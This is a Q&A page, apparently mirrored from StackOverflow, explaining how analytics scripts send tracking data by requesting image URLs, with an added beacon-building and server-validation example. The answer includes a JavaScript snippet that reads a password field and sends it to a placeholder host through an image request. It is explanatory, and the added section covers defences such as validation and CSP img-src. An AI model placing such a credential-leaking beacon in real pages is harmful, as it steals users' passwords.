Question

Anyone knows how Google analytics or Clicky works?

I'm stuck at the fact that I searched the entire http://static.getclicky.com/js file and didn't find any server requests in it. How does it send data without compromising its own security? Or else users could send false data by modifying the js.

Was this helpful?

Solution

Images: these libraries use a trick where they encode all the tracking information they want, append it to the image URL, and "send" it by requesting the image. Server-side parsing of that image filename decodes the information.

Suppose you had a password field that you wanted to send from mydomain.com to somedomain.com:

<input type='password' id='p' />

This JavaScript could send the contents by violating cross-site limits:

// read the value of the password field
var t = document.getElementById('p').value;
// create an image element; setting its src makes the browser issue a GET request
var i = document.createElement('img');
// the query string of the image URL carries the value to somedomain.com
i.src = 'http://somedomain.com/imagescript.php?p=' + t;

Cross-site scripting limitations don't apply to images, and when you compose the image URL request in JavaScript, no browser or logic in the world can account for all possibilities. Suppose we're lucky that GA is ethical and doesn't snag form fields.
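To make the answer's trick concrete, here is an added example (not code from the original answer, Google Analytics or Clicky) of both halves of an image beacon: the client side packs tracking fields into the query string of a pixel URL, and the server side decodes that query string. The endpoint name, field names and length limits are assumptions made up for illustration. The server half also shows the check a practitioner wants in light of the question: because the beacon is built in the browser, anyone can send any values, so the server accepts only known fields with bounded lengths and reports the rest as rejected.

```javascript
// Added example: a minimal image-beacon tracker, runnable under Node.js.
// Endpoint and field names are hypothetical.
const BEACON_ENDPOINT = 'https://tracker.example/pixel.gif'; // assumed endpoint

// Client side: encode tracking fields into an image URL. In a browser this
// string would be assigned to `new Image().src` to fire the request; here we
// only build it so the logic runs offline.
function buildBeaconUrl(fields) {
  const params = new URLSearchParams();
  for (const [key, value] of Object.entries(fields)) {
    params.append(key, String(value));
  }
  // Cache-buster so the browser does not serve the pixel from cache.
  params.append('_', Date.now().toString(36));
  return `${BEACON_ENDPOINT}?${params.toString()}`;
}

// Server side: decode the query string and keep only known fields whose
// values stay within a length limit. Everything else is untrusted client
// input and is reported in `rejected` so it can be logged or alerted on.
const ALLOWED = { page: 512, ref: 512, sid: 64, ev: 32 }; // assumed schema

function parseBeacon(requestUrl) {
  const url = new URL(requestUrl);
  const fields = {};
  const rejected = [];
  for (const [key, value] of url.searchParams) {
    if (key === '_') continue; // cache-buster carries no data
    if (!(key in ALLOWED) || value.length > ALLOWED[key]) {
      rejected.push(key);
      continue;
    }
    fields[key] = value;
  }
  return { fields, rejected };
}

// Demo with constructed data: one legitimate beacon and one that a modified
// script might send with an unknown field and an oversized session id.
function demo() {
  const good = buildBeaconUrl({ page: '/pricing', ref: 'https://example.org/?q=a b', sid: 'abc123', ev: 'view' });
  const forged = buildBeaconUrl({ sid: 'z'.repeat(65), ev: 'view', extra: 'not-a-known-field' });
  return { good: parseBeacon(good), forged: parseBeacon(forged) };
}

console.log(JSON.stringify(demo(), null, 2));
```

The point the server half makes is the answer to the question's worry: the library's JavaScript does not need to hide anything, because the server never trusts what arrives in the pixel request. It validates the schema, attributes the hit to the requesting IP, cookie or session it already controls, and treats anomalies as noise or abuse to be filtered. On the page-owner side, a Content-Security-Policy `img-src` directive limits which origins images may be loaded from, which is the standard mitigation for the data-leaking variant of the same trick.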

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow